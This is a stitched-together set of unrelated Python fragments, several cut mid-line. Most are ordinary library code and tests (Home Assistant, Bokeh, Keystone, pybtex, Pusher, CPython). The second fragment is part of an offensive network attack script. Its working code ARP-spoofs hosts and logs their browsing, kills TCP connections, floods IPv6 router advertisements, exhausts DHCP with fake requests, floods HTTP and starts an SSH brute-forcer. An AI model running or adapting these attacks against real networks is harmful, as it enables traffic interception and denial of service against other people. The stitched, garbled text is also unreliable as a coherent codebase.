def test_wait_on_assets_server(self):
    """Start the assets frontend through start_and_wait with a short
    readiness window, then kill it and verify it is gone."""
    sm_application = SmApplication(self.config_dir_override)
    context = SmContext(sm_application, None, False, False)
    service_resolver = ServiceResolver(sm_application)
    context.kill_everything(True)
    self.startFakeArtifactory()
    port = None
    seconds_to_wait = 5
    append_args = None
    actions.start_and_wait(
        service_resolver,
        context,
        ["PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND"],
        False,
        True,
        False,
        None,
        port,
        seconds_to_wait,
        append_args,
    )
    self.assertIsNotNone(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status())
    context.kill("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND", True)
    self.assertEqual(context.get_service("PYTHON_SIMPLE_SERVER_ASSETS_FRONTEND").status(), [])
def test_python_server_offline(self):
context = SmContext(SmApplication(self.config_dir_overrid |
='store', dest='brute', default="none",
help='Bruteforce SSH of given ip... example : -brute file-192.168.1.254:22')
parser.add_argument('-mitm', action='store', dest='mitm', default="none",
help='Perform MITM Attack on target')
parser.add_argument('-mitmAll', action='store', dest='mitmall', default="none",
help='Perform MITM Attack on all hosts')
parser.add_argument('-stop-mitm', action='store_true', dest='stopmitm', default=False,
help='Stop any Running MITM Attack')
parser.add_argument('-denyTcp', action='store', dest='denytcp', default="none",
help='Deny tcp connections of given host')
parser.add_argument('--dg', action='store', dest='dg', default="none",
help='Perform MITM Attack with given Default Gateway')
parser.add_argument('-craft', action='store', dest='packetcraft', default=False,
help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80')
parser.add_argument('-stress', action='store', dest='stress', default="none",
help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6')
results = parser.parse_args()
### Functions
def httpflood(target):
ip=target
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 80))
s.send("""GET /?="""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """)
print """GET /"""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """
except ValueError:
print "Host seems down or some connection error trying again..."
##################
# --- main option dispatch (Python 2 script; shells out to nmap/dsniff) ---
if not(results.output):
    # Default output file name: current unix timestamp.
    output=str(time.time())
else:
    output=results.output
syn=""
scantype="-sn" #basic ping scan
if not(results.timeout=="none"):
    # Prefix spawned tools with coreutils `timeout <N>s`.
    timeout="timeout "+results.timeout+"s "
    print "\n\nTimeout set for seconds:"+results.timeout
else:
    timeout=""
if(results.scan):
    ipaddr=str(results.scan)
    if(results.arpscan): ##BETA TEST
        # Broadcast an ARP who-has over the subnet and log answering hosts.
        res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipaddr))
        output=str(res.summary( lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%")))
        file=open("arpscan.txt","a")
        print output
        file.write(output)
        file.close()
    else:
        print ipaddr
        if(results.syn):
            scantype="-sS -O" #syn and OS detection
        if(results.service):
            scantype=scantype+" -sV"
        scancmd=timeout+"sudo nmap "+scantype+" -oX "+output+" "+ipaddr #writes xml output so we can convert it into html
        print scancmd
        print os.popen(scancmd).read() #ping scan to know online hosts
if(results.ipv6ra):
    minutes=results.ipv6ra
    print "running for minutes: "+minutes
    #run ipv6 RA flooding for N minutes
    # NOTE(review): `minutes` stays a string while `i` is an int; in
    # Python 2 `int <= str` is always True, so this loop never exits on
    # its own -- confirm intended duration handling.
    i=0
    while (i <= minutes):
        print "Firing RAs everywhere"
        a = IPv6()
        a.dst = "ff02::1" #IPv6 Destination "Everyone" Multicast (broadcast)
        a.display()
        b = ICMPv6ND_RA()
        b.display()
        c = ICMPv6NDOptSrcLLAddr()
        c.lladdr = "00:50:56:24:3b:c0" #MAC
        c.display()
        d = ICMPv6NDOptMTU()
        d.display()
        e = ICMPv6NDOptPrefixInfo()
        e.prefixlen = 64
        # Random 4-hex-digit global prefix for each advertisement.
        randomhex=hex(random.randint(0, 16777215))[2:].upper()
        prefix=randomhex[:4]
        e.prefix = prefix+"::" #Global Prefix
        e.display()
        send(a/b/c/d/e) # Send the packet
        print "Sending IPv6 RA Packet :)"
        time.sleep(1)
        i=i+1
        print i
if not(results.denytcp=="none"): #Works if you are the gateway or during MITM
    target=results.denytcp
    # Background tcpkill against the target host.
    os.popen("nohup "+timeout+"tcpkill host "+target+" >/dev/null 2>&1 &")
    #deny tcp traffic
if not(results.mitmall=="none"): #Most efficent way to arpspoof subnet
    ipnet=results.mitmall
    # Discover live hosts, then ARP-spoof each one against the gateway.
    iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read()
    iplist=iplist.split()
    dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
    dgip=dgip.split()[0]
    print "Spoofing "+dgip+"\n\n"
    print "Targets: \n"
    for ip in iplist:
        print ip
        os.popen("nohup "+timeout+"arpspoof -t "+ip+" "+dgip+" >/dev/null 2>&1 &")
    os.popen("nohup "+timeout+"urlsnarf >> visitedsites >/dev/null 2>&1 &")
    EnaLogging() # Enable iptables-logging
if not(results.mitm=="none"):
    print "im in"
    target=results.mitm
    if(results.dg=="none"): #Searches for gateway
        dg=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
        dg=dg.split()[0]
        print dg
    else:
        dg=results.dg
    #Automatically searches for gateway and arpspoofs the target
    os.popen("nohup "+timeout+"arpspoof -t "+target+" "+dg+" >/dev/null 2>&1 &")
    os.popen("nohup "+timeout+"urlsnarf >> visitedsites &")
    print "Started ARP Spoof and URL Logging"
    #Start ARP Spoofing with given arguments or calculated ones
    EnaLogging() # Enable iptables-logging
    print "Added temp firewall rules to log MITM traffic"
if(results.packetcraft): #Packet Crafting with scapy
########### PACKET CRAFTING EXAMPLE TCP-DST192.168.1.1-SRC192.168.1.10
########### ./boafiPenTest.py -craft TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80-5
craft=(results.packetcraft).split("-")
if("TCP" in craft[0] | ):
a=IP()/TCP()
elif("UDP" in craft[0]):
a=IP()/UDP()
if("DST" in craft[1]):
ipdst=craft[1].repla | ce("DST","")
a.dst=ipdst
if("SRC" in craft[2]):
ipsrc=craft[2].replace("SRC","")
a.src=ipsrc
if("DPORT" in craft[3]):
dport=craft[3].replace("DPORT","")
a.dport=dport
n=craft[4] ##N° of packets
i=0
while(i<=n):
i=i+1
a.display()
send(a)
print "Sent packet"
if not(results.stress=="none"):
try: #if it can
rawstring=results.stress.split("-")
mode=rawstring[0]
except:
print "Can't parse your command"
print "\nusing default DHCPv4 stress attack"
mode="DHCPv4"
count=20
if("DHCPv4" in mode): # DHCPv4-50
count=int(rawstring[1])
iface = "eth0"
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
print unique_hexdigits
packet = (Ether(dst="ff:ff:ff:ff:ff:ff")/
IP(src="0.0.0.0", dst="255.255.255.255")/
UDP(sport=68, dport=67)/
BOOTP(chaddr=RandString(12, unique_hexdigits))/
DHCP(options=[("message-type", "discover"), "end"]))
print "Sending dhcp requests"
sendp(packet,iface=iface,count=count)
if("HTTP" in mode): #HTTP-192.168.1.1-500
ip=rawstring[1]
count=int(rawstring[2])
i=0
while(i<=count):
i=i+1
httpflood(ip)
print "Finished flooding!"
if not(results.brute=="none"): # file-192.168.1.254:22 # file example : usr:pass format!!
cmd=results.brute ### Parsing strings to avoid errors
file=cmd.split("-")[0]
ip=cmd.split("-")[1]
ipparsed=ip.split(":")
ip=ipparsed[0].split()[0]
port=int(ipparsed[1].split()[0]) #remove spaces and then int
f=open(file,"r")
print "Start bruteforcing |
#!/usr/bin/env python3
# Copyright (c) 2020 VMware Inc. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import itertools
import string
# Path to the input schema (a JSON array of {name, kind} column records).
infile = '../../../../ontime_private/short.schema'
# Two-letter US state/territory codes, used as string-quantization
# boundaries for the OriginState/DestState columns.
states = [ "AK", "AL", "AR", "AZ", "CA", "CO", "CT", "DE", "FL", "GA", "HI", "IA", "ID", "IL", "IN", "KS",
           "KY", "LA", "MA", "MD", "ME", "MI", "MN", "MO", "MS", "MT", "NC", "ND", "NE", "NH", "NJ", "NM",
           "NV", "NY", "OH", "OK", "OR", "PA", "PR", "RI", "SC", "SD", "TN", "TT", "TX", "UT", "VA", "VT",
           "WA", "WI", "WV", "WY" ]
# Airline carrier codes, used as boundaries for the UniqueCarrier column.
carriers = ["9E", "AA", "AS", "B6", "CO", "DH", "DL", "EV", "F9", "FL", "G4", "GA", "HP", "KH", "MQ", "NK",
            "NW", "OH", "OO", "TW", "TZ", "UA", "US", "VX", "WN", "XE", "YV", "YX"]
def get_metadata(cn):
    """Return the DoubleColumnQuantization descriptor for numeric column *cn*.

    Raises:
        Exception: if *cn* is not one of the known numeric columns.
    """
    # (granularity, global minimum, global maximum) per known column.
    numeric_ranges = {
        "DayOfWeek": (1, 1, 7),
        "DepTime": (5, 0, 2400),
        "ArrTime": (5, 0, 2400),
        "DepDelay": (1, -100, 1000),
        "ArrDelay": (1, -100, 1000),
        "Cancelled": (1, 0, 1),
        "ActualElapsedTime": (1, 15, 800),
        "Distance": (10, 0, 5100),
        # FlightDate alternatives kept for reference:
        # cluster values: (86400000, 852076800000, 1561852800000)
        # 2017 values: (86400000, 1483286400000, 1514736000000)
        # 2016 values, 2 months: (86400000, 1451635200000, 1456732800000)
        "FlightDate": (86400000, 1451635200000, 1456732800000),
    }
    if cn not in numeric_ranges:
        raise Exception("Unexpected column " + cn)
    g, gMin, gMax = numeric_ranges[cn]
    return {'type': "DoubleColumnQuantization",
            'granularity': g,
            'globalMin': gMin,
            'globalMax': gMax}
def get_string_metadata(col):
    """Return the StringColumnQuantization descriptor for string column *col*.

    State columns use US state codes as bucket boundaries, UniqueCarrier
    uses airline codes, and any other column falls back to A..Z.
    """
    if col in ("OriginState", "DestState"):
        boundaries = states
    elif col == "UniqueCarrier":
        boundaries = carriers
    else:
        boundaries = list(string.ascii_uppercase)
    # NOTE(review): 'a' sorts after every uppercase boundary in ASCII, so it
    # acts as an upper sentinel — presumably intentional; confirm upstream.
    return {'type': "StringColumnQuantization",
            'globalMax': 'a',
            'leftBoundaries': boundaries }
def main():
    """Read the flight schema and write privacy_metadata.json.

    Emits one quantization descriptor per schema column plus default
    epsilons keyed by the number of columns in a query.
    """
    with open(infile, 'r') as f:
        schema = json.loads(f.read())
    # NOTE: the original also built every sorted 2-column combination of the
    # column names here (`itertools.combinations`) but never used the result;
    # that dead code has been removed.
    quantization = {}
    # Default privacy budget (epsilon) per query column count.
    defaultEpsilons = { "0": 1, "1": 1, "2": .1 }
    for col in schema:
        cn = col["name"]
        if col["kind"] == "String":
            quantization[cn] = get_string_metadata(cn)
        else:
            quantization[cn] = get_metadata(cn)
    output = {'epsilons': {}, 'defaultEpsilons': defaultEpsilons,
              'quantization': { 'quantization': quantization } }
    with open('privacy_metadata.json', 'w') as f:
        f.write(json.dumps(output))
if __name__=='__main__':
    main()
|
from apps.plus_permissions.default_agents import get_admin_user
from apps.plus_permissions.models import GenericReference
def patch():
    """Backfill GenericReference rows with no creator, assigning the admin user."""
    orphaned = GenericReference.objects.filter(creator=None)
    for reference in orphaned:
        reference.creator = get_admin_user()
        reference.save()
patch()
|
"""Websocekt API handlers for the hassio integration."""
import logging
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.core import HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dis | patcher_connect,
async_dispatcher_send,
)
from .const import (
ATTR_DATA,
ATTR_ENDPOINT,
ATTR_METHOD,
ATTR_RESULT,
ATTR_TIMEOUT,
ATTR_WS_EVENT,
DOMAIN,
EVENT_SUPERVISOR_EVENT,
WS_ID,
WS_TYPE,
WS_TYPE_API,
WS_TYPE_EVENT,
WS_TYPE_SUBSCRIBE,
)
from .handler import HassIO
# Schema for events forwarded to subscribers: only ATTR_WS_EVENT is
# required; any extra keys are passed through untouched (ALLOW_EXTRA).
SCHEMA_WEBSOCKET_EVENT = vol.Schema(
    {vol.Required(ATTR_WS_EVENT): cv.string},
    extra=vol.ALLOW_EXTRA,
)
# Module-level logger for the hassio websocket API handlers.
_LOGGER: logging.Logger = logging.getLogger(__package__)
@callback
def async_load_websocket_api(hass: HomeAssistant):
    """Set up the websocket API."""
    # Register every hassio websocket command handler defined in this module.
    for handler in (
        websocket_supervisor_event,
        websocket_supervisor_api,
        websocket_subscribe,
    ):
        websocket_api.async_register_command(hass, handler)
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command({vol.Required(WS_TYPE): WS_TYPE_SUBSCRIBE})
async def websocket_subscribe(
    hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
    """Subscribe to supervisor events."""

    @callback
    def relay(data):
        """Forward events to websocket."""
        connection.send_message(websocket_api.event_message(msg[WS_ID], data))

    # Track the unsubscribe callback so the connection can clean up later.
    unsubscribe = async_dispatcher_connect(hass, EVENT_SUPERVISOR_EVENT, relay)
    connection.subscriptions[msg[WS_ID]] = unsubscribe
    connection.send_message(websocket_api.result_message(msg[WS_ID]))
@websocket_api.async_response
@websocket_api.websocket_command(
    {
        vol.Required(WS_TYPE): WS_TYPE_EVENT,
        vol.Required(ATTR_DATA): SCHEMA_WEBSOCKET_EVENT,
    }
)
async def websocket_supervisor_event(
    hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
    """Publish events from the Supervisor."""
    # Fan the event payload out to all subscribed websocket clients.
    payload = msg[ATTR_DATA]
    async_dispatcher_send(hass, EVENT_SUPERVISOR_EVENT, payload)
    connection.send_result(msg[WS_ID])
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command(
    {
        vol.Required(WS_TYPE): WS_TYPE_API,
        vol.Required(ATTR_ENDPOINT): cv.string,
        vol.Required(ATTR_METHOD): cv.string,
        vol.Optional(ATTR_DATA): dict,
        vol.Optional(ATTR_TIMEOUT): vol.Any(cv.Number, None),
    }
)
async def websocket_supervisor_api(
    hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
    """Websocket handler to call Supervisor API."""
    supervisor: HassIO = hass.data[DOMAIN]
    try:
        result = await supervisor.send_command(
            msg[ATTR_ENDPOINT],
            method=msg[ATTR_METHOD],
            timeout=msg.get(ATTR_TIMEOUT, 10),
            payload=msg.get(ATTR_DATA, {}),
        )
        # The Supervisor reports failures in-band; surface them as errors.
        if result.get(ATTR_RESULT) == "error":
            raise hass.components.hassio.HassioAPIError(result.get("message"))
    except hass.components.hassio.HassioAPIError as err:
        # Fixed duplicated word in the log message ("Failed to to call").
        _LOGGER.error("Failed to call %s - %s", msg[ATTR_ENDPOINT], err)
        connection.send_error(
            msg[WS_ID], code=websocket_api.ERR_UNKNOWN_ERROR, message=str(err)
        )
    else:
        connection.send_result(msg[WS_ID], result.get(ATTR_DATA, {}))
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh.core.serialization import Buffer
from bokeh.core.types import ID
from bokeh.protocol | import Protocol
from bokeh.protocol.exceptions impor | t ValidationError
# Module under test
from bokeh.protocol import receiver # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
proto = Protocol()
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_creation() -> None:
    # A Receiver must be constructible even without a protocol instance.
    receiver.Receiver(None)
async def test_validation_success() -> None:
    """Consuming header, metadata, and content in order yields one message."""
    msg = proto.create('ACK')
    rcv = receiver.Receiver(proto)
    # The first two fragments leave the message incomplete.
    assert await rcv.consume(msg.header_json) is None
    assert await rcv.consume(msg.metadata_json) is None
    # The content fragment completes it.
    complete = await rcv.consume(msg.content_json)
    assert complete is not None
    assert complete.msgtype == msg.msgtype
    assert complete.header == msg.header
    assert complete.content == msg.content
    assert complete.metadata == msg.metadata
async def test_validation_success_with_one_buffer() -> None:
    """A message declaring one buffer completes only once its payload arrives."""
    rcv = receiver.Receiver(proto)
    fragments = [
        '{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}',
        '{}',
        '{"bar": 10}',
        '{"id": "buf_header"}',
    ]
    for fragment in fragments:
        assert await rcv.consume(fragment) is None
    complete = await rcv.consume(b'payload')
    assert complete is not None
    assert complete.msgtype == "PATCH-DOC"
    assert complete.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}
    assert complete.content == {"bar":10}
    assert complete.metadata == {}
    assert complete.buffers == [Buffer(ID("buf_header"), b"payload")]
async def test_multiple_validation_success_with_multiple_buffers() -> None:
    """One receiver can parse back-to-back messages carrying 0..9 buffers each."""
    rcv = receiver.Receiver(proto)
    for num_buffers in range(10):
        partial = await rcv.consume(
            f'{{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":{num_buffers}}}'
        )
        partial = await rcv.consume('{}')
        partial = await rcv.consume('{"bar": 10}')
        for index in range(num_buffers):
            partial = await rcv.consume(f'{{"id": "header{index}"}}')
            partial = await rcv.consume(f'payload{index}'.encode())
        # After the last expected fragment the message must be complete.
        assert partial is not None
        assert partial.msgtype == "PATCH-DOC"
        assert partial.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers": num_buffers}
        assert partial.content == {"bar":10}
        assert partial.metadata == {}
        for index in range(num_buffers):
            assert partial.buffers[index] == Buffer(ID(f"header{index}"), f"payload{index}".encode())
async def test_binary_header_raises_error() -> None:
    """A header fragment must be text; a bytes header is rejected."""
    rcv = receiver.Receiver(proto)
    with pytest.raises(ValidationError):
        await rcv.consume(b'{"msgtype": "PATCH-DOC", "msgid": "10"}')
async def test_binary_metadata_raises_error() -> None:
    """A metadata fragment must be text; a bytes metadata is rejected."""
    rcv = receiver.Receiver(proto)
    await rcv.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
    with pytest.raises(ValidationError):
        await rcv.consume(b'metadata')
async def test_binary_content_raises_error() -> None:
    """A content fragment must be text; a bytes content is rejected."""
    rcv = receiver.Receiver(proto)
    await rcv.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
    await rcv.consume('metadata')
    with pytest.raises(ValidationError):
        await rcv.consume(b'content')
async def test_binary_payload_header_raises_error() -> None:
    """A buffer header must be text; a bytes buffer header is rejected."""
    rcv = receiver.Receiver(proto)
    await rcv.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
    await rcv.consume('{}')
    await rcv.consume('{}')
    with pytest.raises(ValidationError):
        await rcv.consume(b'{"id": "buf_header"}')
async def test_text_payload_buffer_raises_error() -> None:
    """A buffer payload must be bytes; a text payload is rejected."""
    rcv = receiver.Receiver(proto)
    await rcv.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
    await rcv.consume('{}')
    await rcv.consume('{}')
    await rcv.consume('{"id": "buf_header"}')
    with pytest.raises(ValidationError):
        await rcv.consume('buf_payload')
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/li | censes/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# L | icense for the specific language governing permissions and limitations
# under the License.
"""Keystone UUID Token Provider"""
from __future__ import absolute_import
import uuid
from keystone.token.providers import common
class Provider(common.BaseProvider):
    """Token provider that issues unpredictable UUID4 hex token IDs."""
    # The original defined an __init__ that only forwarded to super();
    # that no-op has been removed — construction behavior is unchanged.

    def _get_token_id(self, token_data):
        # token_data is unused: a UUID token carries no state in the ID itself.
        return uuid.uuid4().hex
|
# Copyright (c) 2008, 2009, 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from xml.sax.saxutils import escape
from pybtex.backends import BaseBackend
import pybtex.io
# Default file extension for rendered bibliography output.
file_extension = 'html'
# HTML document skeleton; the %s placeholder is filled with the output
# character encoding by write_prologue().
PROLOGUE = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><meta name="generator" content="Pybtex">
<meta http-equiv="Content-Type" content="text/html; charset=%s">
<title>Bibliography</title>
</head>
<body>
<dl>
"""
class Backend(BaseBackend):
name = 'html'
suffixes = '.html',
symbols = {
'ndash': u'–',
'newblock': u'\n',
'nbsp': u' '
}
tags = {
'emph': u'em',
}
def format_text(self, text):
return escape(text)
def format_tag(self, tag_name, text):
tag = self.tags[tag_name]
return ur'<%s>%s</%s>' % (tag, text, tag)
def write_prologue(self, maxlen):
encoding = self.encoding or pybtex.io.get_default_encoding()
self. | output(PROLOGUE % encoding)
def write_epilogue(sel | f):
self.output(u'</dl></body></html>\n')
def write_entry(self, key, label, text):
self.output(u'<dt>%s</dt>\n' % label)
self.output(u'<dd>%s</dd>\n' % text)
|
# -*- coding: utf-8 -*-
from __future__ import (print_function, unicode_literals, absolute_import,
division)
import json
import re
import six
import sys
# Validation patterns.  Raw string literals are now used: the originals relied
# on unrecognized escapes like '\A' and '\d' passing through unchanged, which
# is a SyntaxWarning in current Python and slated to become an error.
# The compiled patterns are byte-for-byte identical to before.
channel_name_re = re.compile(r'\A[-a-zA-Z0-9_=@,.;]+\Z')
app_id_re = re.compile(r'\A[0-9]+\Z')
pusher_url_re = re.compile(r'\A(http|https)://(.*):(.*)@(.*)/apps/([0-9]+)\Z')
socket_id_re = re.compile(r'\A\d+\.\d+\Z')
# Human-readable type name used in error messages (Python 2 str/unicode split).
if sys.version_info < (3,):
    text = 'a unicode string'
else:
    text = 'a string'
def ensure_text(obj, name):
    """Coerce *obj* to unicode text, raising TypeError for non-strings."""
    if isinstance(obj, six.string_types):
        # Already unicode: return as-is; byte string: decode via text_type.
        return obj if isinstance(obj, six.text_type) else six.text_type(obj)
    raise TypeError("%s should be %s" % (name, text))
def validate_channel(channel):
    """Validate a channel name: text, at most 200 chars, allowed charset only."""
    channel = ensure_text(channel, "channel")
    # Length is checked before the character class, matching original behavior.
    if len(channel) > 200:
        raise ValueError("Channel too long: %s" % channel)
    if channel_name_re.match(channel) is None:
        raise ValueError("Invalid Channel: %s" % channel)
    return channel
def validate_socket_id(socket_id):
    """Validate a socket id of the form '<digits>.<digits>'."""
    socket_id = ensure_text(socket_id, "socket_id")
    if socket_id_re.match(socket_id) is None:
        raise ValueError("Invalid socket ID: %s" % socket_id)
    return socket_id
|
ssertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
    def test_getframe(self):
        # Too many arguments and absurd depths must fail cleanly.
        self.assertRaises(TypeError, sys._getframe, 42, 42)
        self.assertRaises(ValueError, sys._getframe, 2000000000)
        # With no argument, _getframe returns the caller's own frame.
        self.assertTrue(
            SysModuleTest.test_getframe.__code__ \
            is sys._getframe().f_code
        )
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
    # Test sys._current_frames() in a WITH_THREADS build.
    @test.support.reap_threads
    def current_frames_with_threads(self):
        """Check sys._current_frames() maps both main and worker thread ids
        to sensible frames while the worker is parked at a known line."""
        import threading, _thread
        import traceback
        # Spawn a thread that blocks at a known place.  Then the main
        # thread does sys._current_frames(), and verifies that the frames
        # returned make sense.
        entered_g = threading.Event()
        leave_g = threading.Event()
        thread_info = []  # the thread's id
        def f123():
            g456()
        def g456():
            thread_info.append(_thread.get_ident())
            entered_g.set()
            leave_g.wait()
        t = threading.Thread(target=f123)
        t.start()
        entered_g.wait()
        # At this point, t has finished its entered_g.set(), although it's
        # impossible to guess whether it's still on that line or has moved on
        # to its leave_g.wait().
        self.assertEqual(len(thread_info), 1)
        thread_id = thread_info[0]
        d = sys._current_frames()
        main_id = _thread.get_ident()
        self.assertIn(main_id, d)
        self.assertIn(thread_id, d)
        # Verify that the captured main-thread frame is _this_ frame.
        frame = d.pop(main_id)
        self.assertTrue(frame is sys._getframe())
        # Verify that the captured thread frame is blocked in g456, called
        # from f123.  This is a little tricky, since various bits of
        # threading.py are also in the thread's call stack.
        frame = d.pop(thread_id)
        stack = traceback.extract_stack(frame)
        for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
            if funcname == "f123":
                break
        else:
            self.fail("didn't find f123() on thread's call stack")
        self.assertEqual(sourceline, "g456()")
        # And the next record must be for g456().
        filename, lineno, funcname, sourceline = stack[i+1]
        self.assertEqual(funcname, "g456")
        # The worker may be captured on either of its last two lines.
        self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
        # Reap the spawned thread.
        leave_g.set()
        t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
    def test_attributes(self):
        """Smoke-check the types and basic invariants of sys's public attributes."""
        self.assertIsInstance(sys.api_version, int)
        self.assertIsInstance(sys.argv, list)
        self.assertIn(sys.byteorder, ("little", "big"))
        self.assertIsInstance(sys.builtin_module_names, tuple)
        self.assertIsInstance(sys.copyright, str)
        self.assertIsInstance(sys.exec_prefix, str)
        self.assertIsInstance(sys.executable, str)
        self.assertEqual(len(sys.float_info), 11)
        self.assertEqual(sys.float_info.radix, 2)
        self.assertEqual(len(sys.int_info), 2)
        self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
        self.assertTrue(sys.int_info.sizeof_digit >= 1)
        self.assertEqual(type(sys.int_info.bits_per_digit), int)
        self.assertEqual(type(sys.int_info.sizeof_digit), int)
        self.assertIsInstance(sys.hexversion, int)
        self.assertEqual(len(sys.hash_info), 5)
        self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
        # sys.hash_info.modulus should be a prime; we do a quick
        # probable primality test (doesn't exclude the possibility of
        # a Carmichael number)
        for x in range(1, 100):
            self.assertEqual(
                pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
                1,
                "sys.hash_info.modulus {} is a non-prime".format(
                    sys.hash_info.modulus)
                )
        self.assertIsInstance(sys.hash_info.inf, int)
        self.assertIsInstance(sys.hash_info.nan, int)
        self.assertIsInstance(sys.hash_info.imag, int)
        self.assertIsInstance(sys.maxsize, int)
        self.assertIsInstance(sys.maxunicode, int)
        self.assertIsInstance(sys.platform, str)
        self.assertIsInstance(sys.prefix, str)
        self.assertIsInstance(sys.version, str)
        # version_info behaves both as a 5-tuple and as a named tuple.
        vi = sys.version_info
        self.assertIsInstance(vi[:], tuple)
        self.assertEqual(len(vi), 5)
        self.assertIsInstance(vi[0], int)
        self.assertIsInstance(vi[1], int)
        self.assertIsInstance(vi[2], int)
        self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
        self.assertIsInstance(vi[4], int)
        self.assertIsInstance(vi.major, int)
        self.assertIsInstance(vi.minor, int)
        self.assertIsInstance(vi.micro, int)
        self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
        self.assertIsInstance(vi.serial, int)
        # Index access and attribute access must agree.
        self.assertEqual(vi[0], vi.major)
        self.assertEqual(vi[1], vi.minor)
        self.assertEqual(vi[2], vi.micro)
        self.assertEqual(vi[3], vi.releaselevel)
        self.assertEqual(vi[4], vi.serial)
        self.assertTrue(vi > (1,0,0))
        self.assertIsInstance(sys.float_repr_style, str)
        self.assertIn(sys.float_repr_style, ('short', 'legacy'))
        # abiflags is POSIX-only.
        if not sys.platform.startswith('win'):
            self.assertIsInstance(sys.abiflags, str)
